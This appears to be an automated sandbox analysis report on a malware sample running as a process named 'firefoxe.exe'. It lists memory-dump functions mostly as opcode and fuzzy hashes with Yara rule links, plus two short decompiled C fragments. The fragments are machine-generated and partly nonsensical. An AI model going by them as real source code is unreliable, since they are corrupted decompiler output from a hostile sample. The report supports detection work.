Instruction ID: 9ebd032a9a0b40de4a493725fd23e408152be5de50f60895fb91d63e349c9274
Opcode Fuzzy Hash: 48e221c55173a4b387dcfb14097637f389257661fa310cb1e7156cb984fc35ac
Instruction Fuzzy Hash: 12F02EB29952B08FD735C328E004B2A7BE89B04338FB8A467E607A3245C7B0FC80C250

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2073, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92531b75e94160e9d2fbe8c0b01c55c41f63bc524797d4c6e074d8e201f53281
Instruction ID: 99f033e9b47c81093cadb1957bea2627731d05301dc089d1d72d60cb69cafa32
Opcode Fuzzy Hash: 92531b75e94160e9d2fbe8c0b01c55c41f63bc524797d4c6e074d8e201f53281
Instruction Fuzzy Hash: D4F027264111848FCF36AB266B03BF26BD4C795318F19308FE69077242C8768C87CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00E4927A, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 9f73895e2d5c2eaec52bf36441ddae1c78c1599348bd96ec5c7d7f396a882326
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 1FE0ED322406002BE7219E0AEC85B0336A9AF82B20F004078B9042E293CAE6DD0887A4

Uniqueness

Uniqueness Score: -1.00%

Function 00ED8D34, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3355a206313370c31e8bb37a8acac183e4be353192a032f4d5fbd03c739beda
Instruction ID: 84d06ca394aca2ee64a9ac9c1cad834613ee58d81242f1877c9f7cce9dc65b07
Opcode Fuzzy Hash: d3355a206313370c31e8bb37a8acac183e4be353192a032f4d5fbd03c739beda
Instruction Fuzzy Hash: EFF09070A046089FCB04EBB9E942A6E77B8EF04700F508099F905FB392DA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 00ED8B58, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686f1ec1eeb877d27b8ef895f7c0b39a34212218144606514ba3afba699c593a
Instruction ID: 8c766f389995ee200f74f8bacf85094f3534ddc2b3ab8d0cfc7bb516d0a41e25
Opcode Fuzzy Hash: 686f1ec1eeb877d27b8ef895f7c0b39a34212218144606514ba3afba699c593a
Instruction Fuzzy Hash: A5F05470A142589BDB00EBB5E906E6E77B4EF04300F541459B905FB391EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 00ED8CD6, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b97c53d59d0254dbe8bf3ba7798defc835945991357852e08daf687b135f8d
Instruction ID: d00aa96c3fbdf745ca2cc87e8bf4507833e009cea7b40161021d31865ef8cef0
Opcode Fuzzy Hash: b8b97c53d59d0254dbe8bf3ba7798defc835945991357852e08daf687b135f8d
Instruction Fuzzy Hash: E0F05E70A05208ABCB04DBB9E946EAE77B8EF49300F50119AF915FB3D2EA34D900D754

Uniqueness

Uniqueness Score: -1.00%

Function 00E2746D, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd2ab1511abb8e93154aa4e80983b9c88734b61bc05dd33487a7b9eaf6e4813
Instruction ID: 913537e8f9cf72f968411d2fdc20dc3b3049016c087b0a9aea496a585a6d26d4
Opcode Fuzzy Hash: 3fd2ab1511abb8e93154aa4e80983b9c88734b61bc05dd33487a7b9eaf6e4813
Instruction Fuzzy Hash: CDF0E93494C164EACF11B768F840FB97BB1AF14358F143216E8F1B7151E7649C00C785

Uniqueness

Uniqueness Score: -1.00%

Function 00E04F2E, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560e626ac2da5b3abaebca0214e53084f8f3be26c35c594be116e7d2dd086aed
Instruction ID: 8723df3a43695c5e674964a8bbce09edf9bf73a552046f96e4508dd48c79de57
Opcode Fuzzy Hash: 560e626ac2da5b3abaebca0214e53084f8f3be26c35c594be116e7d2dd086aed
Instruction Fuzzy Hash: 55F0E2769A56A48FD771D718E240B27B7D4EB017FCF54B465E406A7A21C734EC80C644

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A44B, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c14b08726f7b3fa43c82b9ff03fb4eedda768082592fdb15392ee50f4fd127
Instruction ID: 435c4130f34fe4ad8b82b519540e18262c6a2bcfd970fda6c19a2ab1b0fe4b3d
Opcode Fuzzy Hash: 76c14b08726f7b3fa43c82b9ff03fb4eedda768082592fdb15392ee50f4fd127
Instruction Fuzzy Hash: 46E02272A01420ABD2218B08BC00F6673ADDBD1B00F090038F548E7210D668DD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E0F358, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: dc9d6f4848b5a6223d8b0111310ec9a2dcfc9b06442c9c66a6db558763e78d16
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 82E0DF32A40228BBCB31AAD99E06FAABBECDB48B60F0011A5F904E7590D5749E50C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00E1FF60, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27939ee8f42725b40c9fbad9e7e42a9ba7e6b11667a0add60d2f306eb9f0e4eb
Instruction ID: c4edc94f6ffe511a56cddb6704fef5e5633c25364e1fadb0b50598fa294b07ec
Opcode Fuzzy Hash: 27939ee8f42725b40c9fbad9e7e42a9ba7e6b11667a0add60d2f306eb9f0e4eb
Instruction Fuzzy Hash: 3AE0D8B03052459FD734D751D140F953799BB55725F19642DF00B57102C671DCC2C295

Uniqueness

Uniqueness Score: -1.00%

Function 00E941E8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a7cdf75725a6dd8e43bce11aedfde5ead3540bc1275bd32a11b95778d821db5
Instruction ID: 861f0ed6e7af71572b33627d1405e12f91c35a126db653c9e8e5e790b772336f
Opcode Fuzzy Hash: 6a7cdf75725a6dd8e43bce11aedfde5ead3540bc1275bd32a11b95778d821db5
Instruction Fuzzy Hash: EDF01C74511708CECB60FFA6DA0172436E4F784311F2062A7A500F72E5CB744489CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00EBD380, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: a9781a11bc03c354762971a829c56c093d96d46483b8d4b6f8e0a1701d8ab950
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 1CE0C231288614BBDB225E44CC01FAA7B96DB507A1F204031FE087A792C6759C91E6D5

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A185, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e9bcccb987143b457423c4e89e18efc4f5747901c9437b2aba7dae6b61a584
Instruction ID: c4526462ada86c83bdf995dee19356870eef89e7def4916060b4fb1cd3a0b5f4
Opcode Fuzzy Hash: 41e9bcccb987143b457423c4e89e18efc4f5747901c9437b2aba7dae6b61a584
Instruction Fuzzy Hash: 92D02EA21220042BCF2C2710AC1AF312652E7D0700F38287EF2833B9E5DAA088D4C20A

Uniqueness

Uniqueness Score: -1.00%

Function 00E316E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef068a03d07fa190f04e1c11324368569c3f7ec509ffc295b20de752c943d4e
Instruction ID: 9d50ed4c89ac3ae1880cfc5ae0e8919eff368011be6fdecc560800798c35ebc2
Opcode Fuzzy Hash: 2ef068a03d07fa190f04e1c11324368569c3f7ec509ffc295b20de752c943d4e
Instruction Fuzzy Hash: ACD0A77110014053DA2D5B11980AB143691DFC0789F3820EDF207794C1CFB0DC92E448

Uniqueness

Uniqueness Score: -1.00%

Function 0040C122, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040C122(void* __edi) {

				 *0x00000038 =  *0x00000038 >> 0x72;
				asm("loopne 0x7");
				asm("int 0x89");
				return 0xa5;
			}

0x0040c125
0x0040c130
0x0040c132
0x0040c13e

Memory Dump Source

Source File: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfcb15190189b27280fa1058714e0232bbb73df4301941c4c05530fb1a1257e9
Instruction ID: 9ec1a02203bbc005708c2259a3ea2407333704918af693168606369d32409953
Opcode Fuzzy Hash: dfcb15190189b27280fa1058714e0232bbb73df4301941c4c05530fb1a1257e9
Instruction Fuzzy Hash: 25C08C2AA52004468A281C1EB4902B9F364EEA3167F30B3A7C848EB280481AC81209EE

Uniqueness

Uniqueness Score: -1.00%

Function 00E853CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 3b113c9ce6f156b288e7f937e869c00d79d3418f45c3c6715f5b6d2f9df820b2
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 6CE0EC76944A849BCF12EB59C650F5EB7F5FB44B40F151454B40C6B661CA64AD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E1AAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 4b49fc20be3b529af09d12423a63c1f6c4bd4cc9c60ee3d4905f1bdbf32aa8e4
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 92D0E935352A80CFD616CB1DC954B5573A4BF54B84FC914A0E501DB765E66CED84CA01

Uniqueness

Uniqueness Score: -1.00%

Function 00E335A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 0c4a4727f67424ebc0489b83833fd2c60754267d58f53156e0319715ead11e70
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 49D0C935955184BADB51AB70C21CFA87BB2BB00319F683065A44666A92C33A4F5AD601

Uniqueness

Uniqueness Score: -1.00%

Function 00E0DB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 5acf65eda19e9c36b86edee513e8baadb48e680d19ec5fcce5d597a90704470e
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 62C08C70280A00AAEB225F20CD02B0036A0BB01B05F4500A07300EA0F4DB78DC01EA00

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: f340fdbec9c5a9a43a5d4d96c9d916505e83710aced481f0178ac265b2655a34
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: F3C08C33080248BBCB126F81DD01F067F6AFB94B60F058010FA081B571CA32ED70EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00E23A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: c5e4ccef23a5239e08048f14f2fdbcb519e866c444b994bb606905b62b460cb3
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 86C02B33080248BBC712AF41EC01F017F6DE790B60F000020F7040B5B1C532EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 00E0AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: d29e7d9ae136c7973350fa82cd6b17264ed73361e7c332f444b1001158cbe94e
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 1AC02B330C0248BBC7126F45DD01F017F6DE7A0B60F000021F6040B672C932EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 00E176E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 3e8574827eb343571bd1119d1f6fe85d66fa4c9b083ebd7a165db42e710eeb1b
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: D0C08C701499805AEB2A5708CE31BA036A0AB28B0DF48219CBA91294A2C368AC82C208

Uniqueness

Uniqueness Score: -1.00%

Function 00E336CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: c477b953996c9919ebd8062a15779960c7059a3285dcdb4ce731446473597754
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: C6C02BB0150440BFD715AF30CE02F147294F740B21F6403947220554F0D5389C00D500

Uniqueness

Uniqueness Score: -1.00%

Function 00E27D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 4daa9de12d81aff7469f2387447cc7107f26995f7f72c4d09eb749c89b3a223c
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 54B092343119408FCE16DF28C080B1533E4BB45B44B8400D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 00E32ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: f95e785dbd9d133b3c947202c2422baa227b6db1c303ac1a3826856006fa62e7
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 3DB01232C10440CFCF12EF40C610F597371FB00750F054490B40137A71C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00E9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00E4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00E95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00E95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00e9fdda
0x00e9fde2
0x00e9fde5
0x00e9fdec
0x00e9fdfa
0x00e9fdff
0x00e9fe0a
0x00e9fe0f
0x00e9fe17
0x00e9fe1e
0x00e9fe19
0x00e9fe19
0x00e9fe19
0x00e9fe20
0x00e9fe21
0x00e9fe22
0x00e9fe25
0x00e9fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00E9FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00E9FE2B

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 971ae5f795f43cb3e92dbf7d9df1698a9e4a010125b99323c72a876ebe64b6d0
Instruction ID: 3bc4327a12e42486598dd2ac5e12d3abe4097db1192b0c219b4dc3b75fc29e8f
Opcode Fuzzy Hash: 971ae5f795f43cb3e92dbf7d9df1698a9e4a010125b99323c72a876ebe64b6d0
Instruction Fuzzy Hash: E4F0F632240601BFDA211A85DC06F73BBAAEB44730F254315F628A61E1DAA2FD2097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: firefoxe.exe PID: 3032 Parent PID: 3388 firefoxe.exeCOMMON

Executed Functions

Function 01060C1C, Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c17919f00d3a59096408562e6a10d939b3f2d53ee378281233c7a5039d349494
Instruction ID: dea80ba77c6d656e48c8790149b3b7111a6680493485cb09c860706b3570feec
Opcode Fuzzy Hash: c17919f00d3a59096408562e6a10d939b3f2d53ee378281233c7a5039d349494
Instruction Fuzzy Hash: A3D17C31B002199FDB00DFA9C950BAEBBF6BF84304F258569E5459B799DB70EC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01063BD8, Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f361ea3a7412c3448cb2090be582ab061530a1a82b94375db5b76ff867ce3afe
Instruction ID: 539e8b9457927212e00e7172907570034edebd4f855e778bb33d766e98f58343
Opcode Fuzzy Hash: f361ea3a7412c3448cb2090be582ab061530a1a82b94375db5b76ff867ce3afe
Instruction Fuzzy Hash: 1211C471A0C11DCBCB04869A88816BEBBADBB45730F148522E1CE9F349D232AC4587E2

Uniqueness

Uniqueness Score: -1.00%

Function 010621F8, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9413bf5d39e3fe553d303f6db35e55da6863dceab52598e4a0462850fa5c91
Instruction ID: b1febef3bd94c7c0f3fcea66eb9798a0af2c34e0448d577b693bdd848bba4346
Opcode Fuzzy Hash: cc9413bf5d39e3fe553d303f6db35e55da6863dceab52598e4a0462850fa5c91
Instruction Fuzzy Hash: 30617E70204B428FD725DF29C49076AB7FAAF99310F14CA2DC4DA87B66DB74F8468B50

Uniqueness

Uniqueness Score: -1.00%

Function 010619E0, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b328897fd8c5593f77a9c96e6642f7d7776c313c43259469ef2bab3a2073f1
Instruction ID: 260deddb7676fc5d2d9f651c78284700d1f02bfc92b27f2a5678fcce7cc7314b
Opcode Fuzzy Hash: 11b328897fd8c5593f77a9c96e6642f7d7776c313c43259469ef2bab3a2073f1
Instruction Fuzzy Hash: F851E035208315DFC724CF69D88086EBBFEFFC52157048A6EE0D787A41D730AA048B92

Uniqueness

Uniqueness Score: -1.00%

Function 01060357, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d415ed4461b02914b988d6b64c36fb4b2e265b964202c813622cd861009d5e
Instruction ID: 9a94048c2eaa8f49faf44134ff35623d6854b0482bfde58c1be77073537b9ba5
Opcode Fuzzy Hash: d8d415ed4461b02914b988d6b64c36fb4b2e265b964202c813622cd861009d5e
Instruction Fuzzy Hash: C211FE9244F3D55FD31363381D76AE93F649E13054B0E49DBD0D6CB8A7D908880BA726

Uniqueness

Uniqueness Score: -1.00%

Function 01061552, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56fb4e8f42ca0f0ba8f6fab0854df1ceea6014f0af6ec48bf701940ba8c23b6
Instruction ID: 8211931c5ec8765b7dbabc7b7a2546079dfffd69db76ed57665eb12e61c760c9
Opcode Fuzzy Hash: e56fb4e8f42ca0f0ba8f6fab0854df1ceea6014f0af6ec48bf701940ba8c23b6
Instruction Fuzzy Hash: 0641DC31A40705CFCB14DFA4D85069EB7B2FFC8314B108A6DE646ABB50EF75AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 01061456, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 484a7a993b27967caec0d28b63b2fa99ec2c848dcd4f477027a48b9cc4bff103
Instruction ID: b96009542ae70c7efee5872081aa45af9a94c1bfb1b7e47b15372132a127b017
Opcode Fuzzy Hash: 484a7a993b27967caec0d28b63b2fa99ec2c848dcd4f477027a48b9cc4bff103
Instruction Fuzzy Hash: FD219F36744215CFCB40DF6DD9409EDBBF9AFC4218B0484A1E686DB661EB35E904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01061898, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3119ab4fa568b2d7d05d15c04f687ab2007fa68b1e970cd2c1f3776b797702cf
Instruction ID: 1138828fde8facd6930bcd4e7bef04031fbf33a111235f9a3fcfc1a73cee7751
Opcode Fuzzy Hash: 3119ab4fa568b2d7d05d15c04f687ab2007fa68b1e970cd2c1f3776b797702cf
Instruction Fuzzy Hash: 91119130A0C104DFD7049B59C454ABEBBFEAFC9350F15406AD183E72A1CA719D018BB2

Uniqueness

Uniqueness Score: -1.00%

Function 01061888, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f88e937ec6adbd7612804360fb0f39f4612a44216c817f2f6e34ed885c578d8
Instruction ID: 8521ea881d7b2c02fe78bd2ea3665e1f357fc9396a252b1d739ac8897cf38111
Opcode Fuzzy Hash: 9f88e937ec6adbd7612804360fb0f39f4612a44216c817f2f6e34ed885c578d8
Instruction Fuzzy Hash: E511C230A0C208DFDB058B258415ABD7BFD9BC8340F1100AAD0C3AB291CB704D029BB2

Uniqueness

Uniqueness Score: -1.00%

Function 01060711, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c94b2406f76d0805ecfcbe803d6cc55ba44af6f6152dca17d2782c72fe544e7
Instruction ID: 50c65e56fb731dc8e8ebf5972e7c1be7e730f0fbab4a947a6893535427a2720e
Opcode Fuzzy Hash: 7c94b2406f76d0805ecfcbe803d6cc55ba44af6f6152dca17d2782c72fe544e7
Instruction Fuzzy Hash: 3301B539B8C200DF97155639A9559BD3BEEFE8164431505AAF587C725EDE2C8C048F22

Uniqueness

Uniqueness Score: -1.00%

Function 010613A7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a9d7f791672425e2889eea9473c2fc4612057565b38bd34c802b812c8c7b75a
